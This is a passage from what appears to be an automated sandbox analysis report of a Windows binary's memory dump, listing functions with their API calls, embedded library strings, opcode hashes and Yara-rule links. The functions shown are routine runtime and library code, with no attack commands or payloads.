                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseErrorHandleLast$CreateCriticalEventSection$Concurrency::cancel_current_taskEnterH_prologLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3301521748-0
                                                                                                                                                        • Opcode ID: 7e8c5b01d99a5f1721d956ede7001678f6f04de6a3ef76bab69c25dd42297c4e
                                                                                                                                                        • Instruction ID: 579873a170e2e28824d5a567c31e82e36564d8d158495a94aacee1d17b6eb865
                                                                                                                                                        • Opcode Fuzzy Hash: 7e8c5b01d99a5f1721d956ede7001678f6f04de6a3ef76bab69c25dd42297c4e
                                                                                                                                                        • Instruction Fuzzy Hash: 4511D071D01348EFDB01DFA8D949B9EBBF8BF45314F10859EE055AB282C7B85A04CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A0C42, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00692DE2,00697424,?,006A0BEC,00000001,00000364,?,0068BA4F,0077A468,00000010), ref: 006A0C47
                                                                                                                                                        • _free.LIBCMT ref: 006A0C7C
                                                                                                                                                        • _free.LIBCMT ref: 006A0CA3
                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 006A0CB0
                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 006A0CB9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                        • Opcode ID: bf7f88f3658c98fdd04a04bdbcdf48bbbfb306abecfaf62f0e148c8087a49ad8
                                                                                                                                                        • Instruction ID: 2144439a5ed14aecc1273a3d97b3b9d43108420431a12b520624d03290616fad
                                                                                                                                                        • Opcode Fuzzy Hash: bf7f88f3658c98fdd04a04bdbcdf48bbbfb306abecfaf62f0e148c8087a49ad8
                                                                                                                                                        • Instruction Fuzzy Hash: D801F47268570166E71233356E85E6B266F9BD3771B30032DFA07D2252EA748C039A68
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A9A45, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 006A9A5D
                                                                                                                                                          • Part of subcall function 0069742F: RtlFreeHeap.NTDLL(00000000,00000000,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?), ref: 00697445
                                                                                                                                                          • Part of subcall function 0069742F: GetLastError.KERNEL32(?,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?,?), ref: 00697457
                                                                                                                                                        • _free.LIBCMT ref: 006A9A6F
                                                                                                                                                        • _free.LIBCMT ref: 006A9A81
                                                                                                                                                        • _free.LIBCMT ref: 006A9A93
                                                                                                                                                        • _free.LIBCMT ref: 006A9AA5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 84abf75f47a7e05b3795e55955993564d6dc468ff77a3055e6a1dd9507dcdcb2
                                                                                                                                                        • Instruction ID: eb41a56f5fb8855e02b1af917fcd00e9b383d187ed3ebc1102283d1f3378837e
                                                                                                                                                        • Opcode Fuzzy Hash: 84abf75f47a7e05b3795e55955993564d6dc468ff77a3055e6a1dd9507dcdcb2
                                                                                                                                                        • Instruction Fuzzy Hash: 6BF012325546006BCB60EB68E486D5677EFEA41B107F4E80AF249D7A01CB34FC928B78
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042847C, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 285COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00428481
                                                                                                                                                          • Part of subcall function 0049E81D: __EH_prolog.LIBCMT ref: 0049E822
                                                                                                                                                          • Part of subcall function 0042839C: __EH_prolog.LIBCMT ref: 004283A1
                                                                                                                                                          • Part of subcall function 004A9C20: __EH_prolog.LIBCMT ref: 004A9C25
                                                                                                                                                          • Part of subcall function 004AA80A: __EH_prolog.LIBCMT ref: 004AA80F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: #text$err data!!
                                                                                                                                                        • API String ID: 3519838083-892745888
                                                                                                                                                        • Opcode ID: 01ae5bc66ae7abcc08dec17824b9a2bffbb6ed2a610a6581f938c8914bfd8c13
                                                                                                                                                        • Instruction ID: 8360e7377713226507a8297a6a8058f27af040c7adec12e5ed891f46d0503605
                                                                                                                                                        • Opcode Fuzzy Hash: 01ae5bc66ae7abcc08dec17824b9a2bffbb6ed2a610a6581f938c8914bfd8c13
                                                                                                                                                        • Instruction Fuzzy Hash: 03A1B131A01218EFDF10DBE9D941AEEBBB5AF48304F10416EE505A7261DF389E49CB5A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004112D0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 195COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004112D4
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004112DF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                                                                                        • String ID: ,+x$,+x
                                                                                                                                                        • API String ID: 1681477883-118575591
                                                                                                                                                        • Opcode ID: 79b763318db6a8875865192bd14f976109a72d80cc4039f22bb6de64ba4841d9
                                                                                                                                                        • Instruction ID: ffed26e65482d28cb79ca707d7faea4d678adf99ac6657fb655a50a6e29e847d
                                                                                                                                                        • Opcode Fuzzy Hash: 79b763318db6a8875865192bd14f976109a72d80cc4039f22bb6de64ba4841d9
                                                                                                                                                        • Instruction Fuzzy Hash: 7A71D271D041988BEB04DF99C4902EDFBF5EF19300F68407EE946A7712D2798A46CB68
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069F881, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 0-2802557318
                                                                                                                                                        • Opcode ID: 790eea3230e09781064ab0c59160b5a70229fed23d2367d49dfa01a257d439b3
                                                                                                                                                        • Instruction ID: 92244962a8d14594b32ebfec83862a28a3723376e646767d8018ee9ef81bd9bc
                                                                                                                                                        • Opcode Fuzzy Hash: 790eea3230e09781064ab0c59160b5a70229fed23d2367d49dfa01a257d439b3
                                                                                                                                                        • Instruction Fuzzy Hash: 56519171D0020AEBDF11DFA4C845FEE7BBEAF06714F16012AE405E7AA1D7749A02CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C6370, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 005CAFC0: new.LIBCMT ref: 005CB027
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 005C640C
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                          • Part of subcall function 005C75E0: GetFileAttributesW.KERNEL32(00000000,7E374B29), ref: 005C761C
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 005C6531
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw$AttributesExceptionFileRaise
                                                                                                                                                        • String ID: )K7~$boost::filesystem::create_directories
                                                                                                                                                        • API String ID: 2900745884-2579647465
                                                                                                                                                        • Opcode ID: 0bdd6e70fbde467e4e23964ba765e1db4500ec9873c9697d1baf71e95c2f5b83
                                                                                                                                                        • Instruction ID: 8aeab1c32e58fbefd07005f7cc13f1142bbcd07e60bf1baabd79c10b64c1bdee
                                                                                                                                                        • Opcode Fuzzy Hash: 0bdd6e70fbde467e4e23964ba765e1db4500ec9873c9697d1baf71e95c2f5b83
                                                                                                                                                        • Instruction Fuzzy Hash: 2D5194719002499ECF20EFA0DD46FEE7B78BF55304F50452EE809A7242EB755B49CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0046ECE5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 168COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0046ECEA
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DeallocateH_prologstd::_
                                                                                                                                                        • String ID: 2$9$F
                                                                                                                                                        • API String ID: 3881773970-2004811662
                                                                                                                                                        • Opcode ID: cdc27846d7ec870d3b3de9b25d5fc003261dd784e679b891ef757484a655b474
                                                                                                                                                        • Instruction ID: 7cf2c20400073983725d21fffd39660df008590cfb069ba4accbdf1f08bd6498
                                                                                                                                                        • Opcode Fuzzy Hash: cdc27846d7ec870d3b3de9b25d5fc003261dd784e679b891ef757484a655b474
                                                                                                                                                        • Instruction Fuzzy Hash: AE610671D05248DECF00EFA9D9563EDBFB4AF65304F1480AEE405A7242EB795B04CB9A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005D78A0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: _{]$crypto\async\async.c
                                                                                                                                                        • API String ID: 0-63007400
                                                                                                                                                        • Opcode ID: 4377226890bcad742d763c4d5ba8234dc09cbe0029a0f0a5c1708ec422f62204
                                                                                                                                                        • Instruction ID: f5fb42af170ee742935a4132d391c3cfe29256f440dab69397669cec561bbff1
                                                                                                                                                        • Opcode Fuzzy Hash: 4377226890bcad742d763c4d5ba8234dc09cbe0029a0f0a5c1708ec422f62204
                                                                                                                                                        • Instruction Fuzzy Hash: A34129B67853063EF23036E56C4BF6A3F49FB94B66F00043BFB08A82C2F692551051A2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042A5B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0042A5B5
                                                                                                                                                          • Part of subcall function 00472AE5: __EH_prolog.LIBCMT ref: 00472AEA
                                                                                                                                                          • Part of subcall function 0045D80A: __EH_prolog.LIBCMT ref: 0045D80F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: :bnotes$I$u
                                                                                                                                                        • API String ID: 3519838083-2529854693
                                                                                                                                                        • Opcode ID: c7437585bd8e895e0d4099734e75e5ae3bc0f164205e3822579f30c0a1f02285
                                                                                                                                                        • Instruction ID: 6ea0f11293df022cdc23ac94e79abb51913f935bb619a8720b4c2ba2fa083608
                                                                                                                                                        • Opcode Fuzzy Hash: c7437585bd8e895e0d4099734e75e5ae3bc0f164205e3822579f30c0a1f02285
                                                                                                                                                        • Instruction Fuzzy Hash: F151D3B0C05258EADB10EFA5DD51BEEBB78AF21308F1480AEE40577192DB781F48CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00416939, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 109COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: 2hA$Day of month is not valid for year$d
                                                                                                                                                        • API String ID: 3519838083-22257888
                                                                                                                                                        • Opcode ID: 21429949250e0a761f864e52af5f6eab0d7a7afec6a5c1466ab49487b967b6f1
                                                                                                                                                        • Instruction ID: 31f4a860ab4f5ffecdb93295509815f36f174d02eb601e94c558808bbdc1976b
                                                                                                                                                        • Opcode Fuzzy Hash: 21429949250e0a761f864e52af5f6eab0d7a7afec6a5c1466ab49487b967b6f1
                                                                                                                                                        • Instruction Fuzzy Hash: F331F4B3B001149BEB14DF69DD0A7EFB7A5AB54354F06812BF404EB2C0E678CE808294
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069F669, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,?,?,?,0069F9C8,00000003,?,00000000), ref: 0069F71C
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0069F9C8,00000003,?,00000000,?,00000003,0000000C,00000003,00000003,0000000C), ref: 0069F74A
                                                                                                                                                        • GetLastError.KERNEL32(?,0069F9C8,00000003,?,00000000,?,00000003,0000000C,00000003,00000003,0000000C,?,0077A878,00000014,00692FD5,00000000), ref: 0069F77B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 2456169464-2802557318
                                                                                                                                                        • Opcode ID: 18aac2eb1b213ee44d815c40955c9d9dcad5cedd9ebc6fdf1f45036b154af1ea
                                                                                                                                                        • Instruction ID: 728e8e2d831cb0a558373b46b5a4a79e2cea0c445cf40df80db5c999c4b5f6c7
                                                                                                                                                        • Opcode Fuzzy Hash: 18aac2eb1b213ee44d815c40955c9d9dcad5cedd9ebc6fdf1f45036b154af1ea
                                                                                                                                                        • Instruction Fuzzy Hash: 8D318F75A002199FCF14CF69DC909EAB7BAEB08344F1544BEE90AD7660D630AD81CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C6EA0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(7E374B29,?,?,?), ref: 005C6ED7
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 005C6F62
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorException@8LastThrow
                                                                                                                                                        • String ID: )K7~$boost::filesystem::status
                                                                                                                                                        • API String ID: 1006195485-476122722
                                                                                                                                                        • Opcode ID: 1df22682422f79bb3bee5f024b7aac41669550d4dfcef8cb59eb874e9f13025b
                                                                                                                                                        • Instruction ID: 83d76329f1448b2cef73573d61ecc85ea2d3786e9b3cc3cd14bfa4983e5ecf9a
                                                                                                                                                        • Opcode Fuzzy Hash: 1df22682422f79bb3bee5f024b7aac41669550d4dfcef8cb59eb874e9f13025b
                                                                                                                                                        • Instruction Fuzzy Hash: 5421B4B1A00309AFDB10AFE4DC45FAEBB79FB45714F00413EF906AB281DB74A9448795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0049E165, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0049E16A
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DeallocateH_prologstd::_
                                                                                                                                                        • String ID: a-zA-Z0-9_.~-$unnamed-grammar$unnamed-rule
                                                                                                                                                        • API String ID: 3881773970-4031823321
                                                                                                                                                        • Opcode ID: 9857f1f691ad9dc7c73b86daf8c446a63a15f504a692b2dddbfd6990141de826
                                                                                                                                                        • Instruction ID: f5c82557553fb391735af34c30f28254a480eaa0f7b63603bd9198e6db32ce01
                                                                                                                                                        • Opcode Fuzzy Hash: 9857f1f691ad9dc7c73b86daf8c446a63a15f504a692b2dddbfd6990141de826
                                                                                                                                                        • Instruction Fuzzy Hash: CB3125B1C0121C9EDB01DFE5C981AEEFBB4FF18304F50416EE545A7241E7B82A09CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00412CEE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00412CF3
                                                                                                                                                          • Part of subcall function 00412ED6: __EH_prolog.LIBCMT ref: 00412EDB
                                                                                                                                                          • Part of subcall function 004133D3: __EH_prolog.LIBCMT ref: 004133D8
                                                                                                                                                        • new.LIBCMT ref: 00412D50
                                                                                                                                                          • Part of subcall function 00412F31: __EH_prolog.LIBCMT ref: 00412F36
                                                                                                                                                          • Part of subcall function 00413610: __EH_prolog.LIBCMT ref: 00413615
                                                                                                                                                        Strings
                                                                                                                                                        • 41y, xrefs: 00412D20
                                                                                                                                                        • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00412D2A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: 41y$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                                                                                        • API String ID: 3519838083-1006916714
                                                                                                                                                        • Opcode ID: 1f7e2c59af1c31bd6eac23141d7efaee7abc2e97b0e297e9f984fe991f3e4822
                                                                                                                                                        • Instruction ID: f57d167ef99bd1fd727a6f0bad06c7a05e442ee7e3e5ab8d5f477ff4d7a72e8a
                                                                                                                                                        • Opcode Fuzzy Hash: 1f7e2c59af1c31bd6eac23141d7efaee7abc2e97b0e297e9f984fe991f3e4822
                                                                                                                                                        • Instruction Fuzzy Hash: 6F318F71D05288EADF04EFE9D5557DEBBB5AF15308F10445DE044AB282CBB80B48C759
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004ABDA2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • invalid char filename argument, xrefs: 004ABDFE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prologTo_wide_wcslen
                                                                                                                                                        • String ID: invalid char filename argument
                                                                                                                                                        • API String ID: 3743069396-1242024027
                                                                                                                                                        • Opcode ID: ba8e17247b40fd7b607c00028a4adbbb03a082645ec66642810fa43b0ac322ff
                                                                                                                                                        • Instruction ID: 49dd71b8bb12341492ec0e9be690b7f0e2517740065b224252711a030f596c6c
                                                                                                                                                        • Opcode Fuzzy Hash: ba8e17247b40fd7b607c00028a4adbbb03a082645ec66642810fa43b0ac322ff
                                                                                                                                                        • Instruction Fuzzy Hash: 7A219D71D012099EDB14EF98D985AEEBBB8FF19300F1001AEE004A7281D7755F40CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C6880, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004C84C9,?,?,00000000,00000000), ref: 005C68A7
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,004C84C9,?,?,00000000,00000000), ref: 005C68B1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesErrorFileLast
                                                                                                                                                        • String ID: )K7~$boost::filesystem::file_size
                                                                                                                                                        • API String ID: 1799206407-2632968859
                                                                                                                                                        • Opcode ID: 31fd8117633d8748ac190b4eabb80b9b8daf58453d9365a01653caff3d17b8fc
                                                                                                                                                        • Instruction ID: 72572d005d4ad20244764a4dc8e21949a16d03edb4ce07a69efbf2a40e6ded56
                                                                                                                                                        • Opcode Fuzzy Hash: 31fd8117633d8748ac190b4eabb80b9b8daf58453d9365a01653caff3d17b8fc
                                                                                                                                                        • Instruction Fuzzy Hash: D211E531A052006FDB10AB75CC06F6B3BE9EFDA728F840E4DF449D7282E634D9428692
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00681177, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0068150D
                                                                                                                                                        • ___raise_securityfailure.LIBCMT ref: 006815F4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                        • String ID: )K7~$H%y
                                                                                                                                                        • API String ID: 3761405300-175706946
                                                                                                                                                        • Opcode ID: 329975a5e60b7a6ced549f833fbc68a489c482e542c282c5c08e70d6b14643bf
                                                                                                                                                        • Instruction ID: 4cffec9cbf81c764c2c07e3e80ae0de69cca5727c7b22427f596f53d64fa06bb
                                                                                                                                                        • Opcode Fuzzy Hash: 329975a5e60b7a6ced549f833fbc68a489c482e542c282c5c08e70d6b14643bf
                                                                                                                                                        • Instruction Fuzzy Hash: DB21F8B5541204AAD714EF19E995A507BF4BB08310F60C16BE5088BFB2E37C5987CF4D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005CB3A0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 005CAFC0: new.LIBCMT ref: 005CB027
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 005CB41D
